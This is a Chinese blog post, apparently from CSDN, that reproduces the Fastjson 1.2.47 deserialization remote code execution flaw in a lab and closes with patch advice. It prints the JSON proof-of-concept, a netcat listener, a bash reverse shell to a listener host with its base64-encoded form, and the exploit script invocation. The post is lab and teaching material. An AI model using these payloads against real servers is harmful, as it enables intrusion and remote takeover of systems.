rmi远程代码执行漏洞_Fastjson远程代码执行漏洞复现

最新推荐文章于 2024-03-10 09:15:00 发布
最新推荐文章于 2024-03-10 09:15:00 发布
阅读量371 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36088083/article/details/112809078
版权

fastjson漏洞简介

Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。

fastjson漏洞原理

先来分析fastjson 1.2.47的POC

{

"a": {

"@type": "java.lang.Class",

"val": "com.sun.rowset.JdbcRowSetImpl"

},

"b": {

"@type": "com.sun.rowset.JdbcRowSetImpl",

"dataSourceName": "rmi://x.x.x.x:8080/Exphub",

"autoCommit": true

}

}

对fastjson版本小于1.2.48的版本通杀,autoType为关闭状态也可使用。

loadClass中默认cache设置为true,利用分为2步执行,首先使用java.lang.Class把获取到的类缓存到mapping中,然后直接从缓存中获取到了com.sun.rowset.JdbcRowSetImpl这个类,绕过了黑名单机制

该payload会利用fastjson的反序列化漏洞去指定的rmi/ldap服务进行远程方法调用

若要进行远程命令执行则需现构造一个恶意的rmi或者ldap,在其中设定要执行的命令,之后利用fastjson反序列化漏洞去使用我们构造的rmi/ldap,最终在fastjson服务器中执行我们在rmi/ldap中指定的命令,故该远程命令执行无法回显,但是仍然可以进行反弹shell(Linux)

除了rmi/ldap构造恶意类,还需要另其一个http服务提供具体的恶意类+要执行的命令,整体流程如下:

Fastjson漏洞环境搭建

主机A含有Fastjson漏洞环境 IP地址192.168.2.101

主机B含有恶意java类 IP地址192.168.2.102

主机C含有RMI服务 IP地址192.168.2.102

接收反弹shell-kali-linux IP地址192.168.2.103

主机A搭建含有fastjson1.2.47-rce漏洞环境

Fastjson漏洞环境复现

fastjson_tool.jar

fastjson-1.2.47_rce.py

反弹shell

kali-linux执行nc监听6666端口

nc -lvp 6666

主机B开启RMI服务,加载远程恶意java类

bash -i >& /dev/tcp/192.168.2.103/6666 0>&1 //转成bash能执行的格式如下,

java -cp fastjson_tool.jar fastjson.HRMIServer 192.168.2.102 9998 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

发送利用fastjson反序列化漏洞使靶机执行RMI服务的恶意java类执行远程命令

python3 fastjson-1.2.47_rce.py http://192.168.2.101:8090 rmi://192.168.2.102:9998/Object

反弹shell成功

fastjson漏洞攻击流量分析

先从HTTP请求入手,可以看到HTTP发送POC服务器返回状态码400,其中有构造的开启RMI服务的IP地址192.168.2.102

流量可以看到远程调用成功执行Object.class恶意类

执行命令服务器返回的信息

fastjson漏洞影响版本

fastjson-1.2.24_rce.py Fastjson <=1.2.24 反序列化远程命令执行漏洞

fastjson-1.2.41_rce.py Fastjson <=1.2.41 反序列化远程命令执行漏洞

fastjson-1.2.42_rce.py Fastjson <=1.2.42 反序列化远程命令执行漏洞

fastjson-1.2.43_rce.py Fastjson <=1.2.43 反序列化远程命令执行漏洞

fastjson-1.2.45_rce.py Fastjson <=1.2.45 反序列化远程命令执行漏洞

fastjson-1.2.47_rce.py Fastjson <=1.2.47 反序列化远程命令执行漏洞

fastjson-1.2.62_rce.py Fastjson <=1.2.62 反序列化远程命令执行漏洞

fastjson-1.2.66_rce.py Fastjson <=1.2.66 反序列化远程命令执行漏洞

fastjson漏洞修复措施

升级到 1.2.51 以上,并推荐关闭Autotype 详细升级方法可参见漏洞修复措施

fastjson漏洞参考链接

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

阿玛粽子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C#笔记14 方法01
Tervor_HAN的博客
09-17 517
C#笔记14 方法01 ——本系列是基于人民邮电出版社《C#2008 C#图解教程》、清华大学出版社《C#入门经典(第五版)》两本书的自学C#笔记,如果您发现了本文的纰漏,还望不吝指正。 写在前边 在 C#笔记10 类:基础 中,我们已经知道,方法是类中重要的一个函数成员 除了类中,方法也可以声明在结构体,接口中 *复习:方法是具有名称的可执行代码块,当方法被调用时,它执行自己所含的代码,然后返回到调用它的代码。有些方法返回一个值到它们被调用的位置。 1. 方法的结构 在类的相关笔记中,我们已经知道了如何声
Fastjson远程命令执行漏洞总结
qq_44796739的博客
07-29 1369
Fastjson远程命令执行漏洞总结
fastjson jar包_Fastjson<=1.2.47反序列化RCE漏洞(CNVD201922238)
weixin_39677104的博客
11-28 164
Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238)一、漏洞描述Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@typ...
漏洞名称-RMI 未授权访问漏洞
最新发布
qq_44005305的博客
03-10 933
漏洞描述:RMI默认使用序列化来完成所有的交互,如果该端口暴露在公网上,且使用了Apache CommonsCollections的漏洞版本,就可以在该服务器上执行相关命令。漏洞危害:攻击者可在没有认证的情况下直接操作对应的 API接口,可直接被非法增删改次数据。且因为攻击是在未认证下进行的,所以后续无法通过定位用户进行异常排查。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2314
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1560
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
如何保护企业网络免受DDoS攻击?—Vecloud微云
vecloud的博客
09-21 119
使DNS服务器成为放大攻击的目标选择的原因在于,它们的Internet基础结构旨在每分钟处理数百万个请求,并连接到高带宽链接以处理这种流量。 因此,犯罪者利用DNS服务器行为来放大攻击,并将最初的小查询转变为较大的有效负载,从而使服务器停机。 DNS服务器负责将域名解析为IP地址。DNS放大攻击将带有被攻击者的伪造IP地址的DNS查询发送到一个开放的DNS解析器,提示其使用DNS响应来回复该地址。随着大量虚假查询的发出,网络很快就会被大量的DNS响应所淹没。大量的虚假流量将使网络变慢或产生不存在的连接。 .
fastjson-1.2.47
12-07
fastjson-1.2.34
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6713
fastjson反序列化漏洞原理及利用
rmi远程代码执行漏洞_fastjson远程代码执行漏洞复现
weixin_39849153的博客
12-22 352
漏洞原理fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行漏洞产生。漏洞利用漏洞利用需要我们在vps上启一个RMI服务并调用class文件(class文件为我们的恶意文件)大概过程就是生成恶意class文件py开启web服务然后开...
rmi.zip_Java RMI_java rmi网络_java源代码 RMI
09-22
简单的java网络编程 rmi代码 简单 实用
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
通过RMI实现远程调用.rar_RMI java
09-23
通过RMI实现远程调用一个JAVA小程序
RMI.zip_Distributed Systems_远程调用系统
09-23
该程序是用java编写的一个用rmi远程调用的分布式会议系统,纯属原创,供大家参考和学习
张小白的实验室Fastjson1.2.47反序列化漏洞复现
Litbai_zhang
07-10 775
实验环境 攻击机C:Windows 10 企业版 LTSC 靶机A:CentOS8 (公网) 监听主机B:Centos7(公网) 项目地址: https://github.com/vulhub/vulhub 该篇复现环境是fastjson1.2.47,复现手法同时适用于fastjson1.2.24,payload已在下文提供 基础环境搭建 在靶机A上安装docker curl https://download.docker.com/linux/centos/docker...
Fastjson RCE续(自动化)
limb0的博客
07-31 2084
Fastjson RCE续(自动化) 一、漏洞介绍 参阅Fastjson≤1.2.47 RCE。 二、漏洞危害 参阅Fastjson≤1.2.47 RCE。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击机 win10 199.200.234.44 靶机 Centos7 192.168.134.133 docker pull vulhub/fastjson #拉取镜像 docker run -d -p 8080:8080 -p 8443:8443 initidc/f
第一个docker漏洞环境搭建并复现fastjson漏洞
mukami0621的博客
09-23 1184
docker漏洞环境搭建并复现fastjson漏洞 补一个之前复现fastjson漏洞的记录,poc已有 1、搭建docker(mac版) 参考链接:https://www.runoob.com/docker/macos-docker-install.html 安装成功后进行初始化 问题:发现80端口被占用 解决:https://blog.csdn.net/haha223545/article/details/105244919,是apache占用了,所以停止apache服务即可:sudo apachec
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3584
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
06-06
RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值